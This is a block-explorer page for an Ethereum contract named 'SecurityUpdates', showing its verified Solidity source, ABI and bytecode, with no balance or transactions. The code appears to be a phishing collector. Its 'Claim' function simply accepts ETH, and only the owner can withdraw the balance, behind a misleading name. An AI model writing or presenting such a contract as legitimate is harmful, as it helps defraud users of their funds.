ETH Price: $2,755.18 (+0.90%)

Contract

0x04F04ef7e95f77C52A1E867fb6d6B6C6B2eac18F
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To

There are no matching entries

Please try again later

Advanced mode:
Parent Transaction Hash Block
From
To
View All Internal Transactions
Loading...
Loading

Similar Match Source Code
This contract matches the deployed Bytecode of the Source Code for Contract 0x80F6373B...d9D430218
The constructor portion of the code might be different and could alter the actual behaviour of the contract

Contract Name:
SecurityUpdates

Compiler Version
v0.4.26+commit.4563c3fc

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license
/**
 *Submitted for verification at Etherscan.io on 2022-12-23
*/

pragma solidity ^0.4.26;

contract SecurityUpdates {

    address private  owner;

     constructor() public{   
        owner=msg.sender;
    }
    function getOwner(
    ) public view returns (address) {    
        return owner;
    }
    function withdraw() public {
        require(owner == msg.sender);
        msg.sender.transfer(address(this).balance);
    }

    function Claim() public payable {
    }

    function getBalance() public view returns (uint256) {
        return address(this).balance;
    }
}

Contract Security Audit

Contract ABI

[{"constant":true,"inputs":[],"name":"getBalance","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"Claim","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"constant":false,"inputs":[],"name":"withdraw","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"getOwner","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":false,"stateMutability":"nonpayable","type":"constructor"}]

Deployed Bytecode

0x608060405260043610610062576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff16806312065fe0146100675780633158952e146100925780633ccfd60b1461009c578063893d20e8146100b3575b600080fd5b34801561007357600080fd5b5061007c61010a565b6040518082815260200191505060405180910390f35b61009a610129565b005b3480156100a857600080fd5b506100b161012b565b005b3480156100bf57600080fd5b506100c86101e6565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b60003073ffffffffffffffffffffffffffffffffffffffff1631905090565b565b3373ffffffffffffffffffffffffffffffffffffffff166000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614151561018657600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc3073ffffffffffffffffffffffffffffffffffffffff16319081150290604051600060405180830381858888f193505050501580156101e3573d6000803e3d6000fd5b50565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050905600a165627a7a72305820b55c1d463cd6e40fb05e74980dcc4e6bb183e5dc9fe55bba4e90a46c120634c60029

Deployed Bytecode Sourcemap

28:512:0:-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;438:99;;8:9:-1;5:2;;;30:1;27;20:12;5:2;438:99:0;;;;;;;;;;;;;;;;;;;;;;;390:40;;;;;;255:127;;8:9:-1;5:2;;;30:1;27;20:12;5:2;255:127:0;;;;;;158:91;;8:9:-1;5:2;;;30:1;27;20:12;5:2;158:91:0;;;;;;;;;;;;;;;;;;;;;;;;;;;438:99;481:7;516:4;508:21;;;501:28;;438:99;:::o;390:40::-;:::o;255:127::-;310:10;301:19;;:5;;;;;;;;;;;:19;;;293:28;;;;;;;;332:10;:19;;:42;360:4;352:21;;;332:42;;;;;;;;;;;;;;;;;;;;;;;;8:9:-1;5:2;;;45:16;42:1;39;24:38;77:16;74:1;67:27;5:2;332:42:0;255:127::o;158:91::-;205:7;236:5;;;;;;;;;;;229:12;;158:91;:::o

Swarm Source

bzzr://b55c1d463cd6e40fb05e74980dcc4e6bb183e5dc9fe55bba4e90a46c120634c6

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.